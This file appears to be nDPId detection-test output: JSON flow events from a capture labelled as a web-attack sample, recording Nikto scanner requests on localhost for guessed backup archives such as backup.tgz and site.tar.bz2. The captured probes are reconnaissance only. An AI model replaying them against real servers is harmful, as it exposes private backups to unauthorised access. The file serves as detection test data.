00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":1576420277218,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277218,"pkt":"AAAAAAAAAAAAAAAACABFAADHKPlAAEAGEzZ\/AAABfwAAAcQ0H5BMBRBwjCFtgIAYAED+uwAAAQEICp1m\/QqdZv0KR0VUIC8xMjcwMDEudGFyLmx6bWEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":342,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277218,"flow_last_seen":1576420277218,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277218,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50228,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":1576420277219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277219,"pkt":"AAAAAAAAAAAAAAAACABFAADE4jtAAEAGWfZ\/AAABfwAAAcQ2H5DSrNqhX1PVN4AYAED+uAAAAQEICp1m\/QudZv0LR0VUIC9zaXRlLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277219,"flow_last_seen":1576420277219,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277219,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50230,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":1576420277221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277221,"pkt":"AAAAAAAAAAAAAAAACABFAADEaVlAAEAG0th\/AAABfwAAAcQ4H5ChqlHP+pxqwIAYAED+uAAAAQEICp1m\/Q2dZv0NR0VUIC9zaXRlLnRhci5iejIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277221,"flow_last_seen":1576420277221,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277221,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50232,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":1576420277222,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277222,"pkt":"AAAAAAAAAAAAAAAACABFAADCu\/NAAEAGgEB\/AAABfwAAAcQ6H5D46YNpMAqH8IAYAED+tgAAAQEICp1m\/Q6dZv0OR0VUIC9iYWNrdXAudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277222,"flow_last_seen":1576420277222,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277222,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50234,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":1576420277224,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277224,"pkt":"AAAAAAAAAAAAAAAACABFAADCyzFAAEAGcQJ\/AAABfwAAAcQ8H5A0R\/O25IFzRIAYAED+tgAAAQEICp1m\/RCdZv0PR0VUIC9iYWNrdXAudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277224,"flow_last_seen":1576420277224,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277224,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50236,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":1576420277225,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277225,"pkt":"AAAAAAAAAAAAAAAACABFAAC90OxAAEAGa0x\/AAABfwAAAcQ+H5C1k+hxPtlM+IAYAED+sQAAAQEICp1m\/RGdZv0RR0VUIC8wLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":347,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277225,"flow_last_seen":1576420277225,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277225,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50238,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1576420277228,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277228,"pkt":"AAAAAAAAAAAAAAAACABFAAC9wfFAAEAGekd\/AAABfwAAAcRAH5ChSfl1EHb5\/IAYAED+sQAAAQEICp1m\/RSdZv0UR0VUIC8wLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277228,"flow_last_seen":1576420277228,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277228,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50240,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":1576420277229,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277229,"pkt":"AAAAAAAAAAAAAAAACABFAADB75lAAEAGTJt\/AAABfwAAAcRCH5BYYNcNJ8u6iIAYAED+tQAAAQEICp1m\/RWdZv0VR0VUIC8xMjcwMC5hbHogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277229,"flow_last_seen":1576420277229,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277229,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":1576420277231,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277231,"pkt":"AAAAAAAAAAAAAAAACABFAADB77xAAEAGTHh\/AAABfwAAAcREH5CTV9cik40gf4AYAED+tQAAAQEICp1m\/RedZv0WR0VUIC8xMjcwMC5hbHogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":350,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277231,"flow_last_seen":1576420277231,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277231,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50244,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":1576420277232,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277232,"pkt":"AAAAAAAAAAAAAAAACABFAADB9\/xAAEAGRDh\/AAABfwAAAcRGH5CWhs9n6ph7xIAYAED+tQAAAQEICp1m\/RidZv0YR0VUIC8xMjcuMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":351,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277232,"flow_last_seen":1576420277232,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277232,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50246,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":1,"flow_last_seen":1576420277233,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277233,"pkt":"AAAAAAAAAAAAAAAACABFAADB+aZAAEAGQo5\/AAABfwAAAcRIH5BuH8E5NSGMTIAYAED+tQAAAQEICp1m\/RmdZv0ZR0VUIC8xMjcuMC50YXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277233,"flow_last_seen":1576420277233,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277233,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50248,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
